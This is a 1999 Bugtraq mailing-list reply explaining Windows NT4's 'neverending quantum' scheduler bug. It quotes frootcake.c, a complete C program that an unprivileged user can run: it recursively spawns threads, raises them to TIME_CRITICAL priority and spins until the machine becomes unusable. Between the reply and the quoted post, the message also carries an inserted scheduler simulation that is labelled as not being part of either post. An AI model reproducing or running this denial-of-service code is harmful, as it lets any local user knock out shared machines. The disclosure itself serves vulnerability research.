[10794] in bugtraq
Re: ordinary users bringing NT to its knees [repost]
daemon@ATHENA.MIT.EDU (David Schwartz)
Thu Jun 10 16:00:16 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <000401beb378$3e703120$021d85d1@whenever.youwant.to>
Date: Thu, 10 Jun 1999 12:34:23 -0700
Reply-To: David Schwartz <davids@WEBMASTER.COM>
From: David Schwartz <davids@WEBMASTER.COM>
X-To: kiva <kiva@WOOKEY.ORG>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <000d01beb27e$6cc9f1f0$2d01a8c0@jizzlobber>
This is just an exploit for the 'neverending quantum' bug that's been known
for ages (see http://www.sysinternals.com/tips.htm#NEQuantum). It has nothing
to do with the number of threads running (except that you need at least one
per CPU).
The bug occurs when a thread changes its priority. NT changes the thread's
priority, but also gives it a new execution quantum. By repeating this
process, a single thread can monopolize a CPU.
DS
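The mechanism David describes, as an added example that is not code from either post: a toy round-robin scheduler in portable C with a flag that makes a priority change refill the caller's quantum, the way NT 4 is said to. The scheduler, the quantum length, the priority numbers and the names `set_priority`, `pick_next` and `simulate` are this example's own assumptions, not NT internals. The greedy thread bounces its priority once per tick and ends every tick at the same level as its peer, so priority preemption (which the model leaves out) would never fire here; only quantum accounting decides who runs.

```c
/* Model of the "neverending quantum" bug: added example, not code from
 * the Bugtraq posts. Assumptions: one tick of resolution, a thread gets a
 * fresh quantum when dispatched after its predecessor's quantum ends, and
 * in the buggy variant also on every priority change. Priority levels and
 * quantum length are illustrative numbers, not NT's. */
#include <stdio.h>
#include <string.h>

#define QUANTUM   6     /* ticks a thread may run before it must yield */
#define NTHREADS  2

enum { PRIO_NORMAL = 8, PRIO_ABOVE = 9 };   /* illustrative levels */

struct thread {
    const char *name;
    int priority;
    int quantum_left;   /* ticks remaining in the current quantum */
    int ticks_run;      /* accounting for the demo */
    int greedy;         /* 1 = bounces its priority every tick */
};

struct sched {
    struct thread t[NTHREADS];
    int running;                /* index of the current thread */
    int reset_on_prio_change;   /* 1 = NT4-style bug, 0 = fixed */
};

/* What a SetThreadPriority call does to the caller in this model. */
static void set_priority(struct sched *s, struct thread *th, int prio)
{
    th->priority = prio;
    if (s->reset_on_prio_change)
        th->quantum_left = QUANTUM;   /* the bug: a fresh quantum */
}

/* Pick the next thread when the running one has used up its quantum:
 * highest priority wins, and among equals the other threads are scanned
 * before the current one, which gives round-robin behaviour. */
static int pick_next(const struct sched *s)
{
    int best = -1, i;
    for (i = 1; i <= NTHREADS; i++) {
        int cand = (s->running + i) % NTHREADS;
        if (best < 0 || s->t[cand].priority > s->t[best].priority)
            best = cand;
    }
    return best;
}

/* Run the machine for `ticks` ticks with a greedy thread and a well-behaved
 * victim at the same priority. Returns how many ticks the greedy thread got. */
int simulate(int reset_on_prio_change, int ticks)
{
    struct sched s;
    int i;

    memset(&s, 0, sizeof s);
    s.reset_on_prio_change = reset_on_prio_change;
    s.t[0] = (struct thread){ "greedy", PRIO_NORMAL, QUANTUM, 0, 1 };
    s.t[1] = (struct thread){ "victim", PRIO_NORMAL, QUANTUM, 0, 0 };
    s.running = 0;

    for (i = 0; i < ticks; i++) {
        struct thread *cur = &s.t[s.running];
        if (cur->greedy) {
            /* one priority bounce per tick, ending where it started */
            set_priority(&s, cur, PRIO_ABOVE);
            set_priority(&s, cur, PRIO_NORMAL);
        }
        cur->ticks_run++;
        cur->quantum_left--;
        if (cur->quantum_left <= 0) {          /* quantum end: switch */
            s.running = pick_next(&s);
            s.t[s.running].quantum_left = QUANTUM;
        }
    }
    return s.t[0].ticks_run;
}

int main(void)
{
    int total = 60;
    printf("quantum refilled on priority change: greedy got %d/%d ticks\n",
           simulate(1, total), total);
    printf("no refill (fixed):                   greedy got %d/%d ticks\n",
           simulate(0, total), total);
    return 0;
}
```

With the refill in place the greedy thread's quantum never reaches zero, so it takes every tick and the victim never runs; with the refill removed the two threads alternate at quantum boundaries and the greedy one gets an even share. That refill is the whole difference between the buggy and the fixed scheduler in this model, and one spinning thread per CPU is all it takes, which is David's point about the thread count.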
> Hi,
>
> sorry if problems like this are known, but I thought I'd post this just
> in case...
>
> I was curious about how well NT could handle *lots* of threads, so I
> wrote the following. It basically locks up the system with an inability
> to kill the process because (I) never get the task manager up. Pretty bad
> since an ordinary user can run it :/
>
> my system: 2xPPro with NT4 (SP5), 128megs RAM.
>
> cheers
>
> ----------------------------
>
> /*
>  * frootcake.c
>  * kiva@wookey.org
>  *
>  * this tests NT at coping with *really dodgy* code...
>  * it totally brings my SMP box to being unusable (SP5)
>  *
>  * Every thread spawns another copy of itself, pushes that copy to
>  * THREAD_PRIORITY_TIME_CRITICAL and then spins; poobah() recurses
>  * without end, starting one more TIME_CRITICAL thread per frame.
>  */
>
> #include <windows.h>
> #include <stdio.h>
>
> void poobah(void);
>
> DWORD WINAPI thread_func (LPVOID lpv)
> {
>     DWORD id;
>     HANDLE h;
>     BOOL success = 1;
>
>     /* spawn a child running this same function (handle is not checked) */
>     h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
>
>     /* Raise the child to TIME_CRITICAL from whatever level it is at. Once
>      * it is there (or if h is NULL) no case matches, success stays TRUE
>      * and the loop spins forever, so this thread keeps its CPU busy and
>      * never reaches poobah(). Only a failed SetThreadPriority ends it. */
>     while (success){
>         switch (GetThreadPriority (h)){
>         case THREAD_PRIORITY_ABOVE_NORMAL:
>         case THREAD_PRIORITY_BELOW_NORMAL:
>         case THREAD_PRIORITY_HIGHEST:
>         case THREAD_PRIORITY_IDLE:
>         case THREAD_PRIORITY_LOWEST:
>         case THREAD_PRIORITY_NORMAL:
>             success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
>             break;
>         }
>     }
>
>     poobah();
>     return 0;
> }
>
> /* never returns: each frame starts another TIME_CRITICAL thread and
>  * recurses again until the stack is exhausted */
> void poobah(void)
> {
>     DWORD id;
>     HANDLE h;
>
>     h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
>     SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
>
>     poobah();
> }
>
> int main ()
> {
>     printf ("frootcake - kiva@wookey.org\n");
>     poobah();
>     return 0;
> }
>
> /* eof */
>